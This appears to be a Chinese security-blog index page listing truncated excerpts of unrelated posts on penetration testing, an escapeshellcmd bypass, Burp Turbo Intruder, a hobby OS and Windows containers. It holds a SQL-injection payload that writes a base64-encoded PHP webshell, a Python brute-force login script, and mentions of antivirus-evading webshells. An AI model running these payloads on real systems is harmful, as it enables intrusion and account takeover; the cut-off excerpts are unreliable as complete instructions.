山乃柠檬

select '<?php file_put_contents('abab.php',base64_decode('Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCSRfU0VTU0l...

ToaruOS是一套使用C语言编写的开源计算机操作系统，是一个由伊利诺伊大学计算机科学本科生开发的业余爱好操作系统。ToAruOS可在POSIX和x86架构上运行。ToAruOS的主要功能包括对进程和线程的支持...

在某某附近人发来送￥的邀请截图 在棋牌捕鱼上面把赠送的金额打光之后、随之来做个渗透测试....通过意见反馈打到后台地址以及cookie过期....之后 开局一个后台 界面挺不错的有点高级高级的感觉 ...

EDU从邮箱绕过到系统通杀

先看一个例子 本地测试环境：PHP 5.4.45 + Win <?php     $command = 'dir '.$_POST['dir'];     $escaped_command = escapeshellcmd($command);     var_dump($escap...

相信很多师傅在进行渗透测试或者漏洞挖掘的时候都会用到burpsuite这款神器，但是不知道师傅们用过burpsuite里面一款叫turbo intruder的插件么 不管这些，今天看了这篇文章的师傅我相信也会对这...

首先使用常规的目录扫描，无法正常扫描出东西 使用代理池低速扫描成功发现 robots.txt 访问 / SiteServer / 跳转至登陆页面，谷歌一波发现历史漏洞，直接禁用 js 可重置密码 免杀 webshell 使用...

在许多组织中，所运行的很大一部分服务和应用是 Windows 应用。 Windows 容器提供了一种封装进程和包依赖项的方式， 从而简化了 DevOps 实践，令 Windows 应用程序同样遵从云原生模式，实际生产...

爆破用户名密码 from urllib import quote def user_password_brute(target, engine): for password in open('D:\\crypto\\mutou\\fuzzDicts\\passwordDict\\top500.txt'): for user in open('D...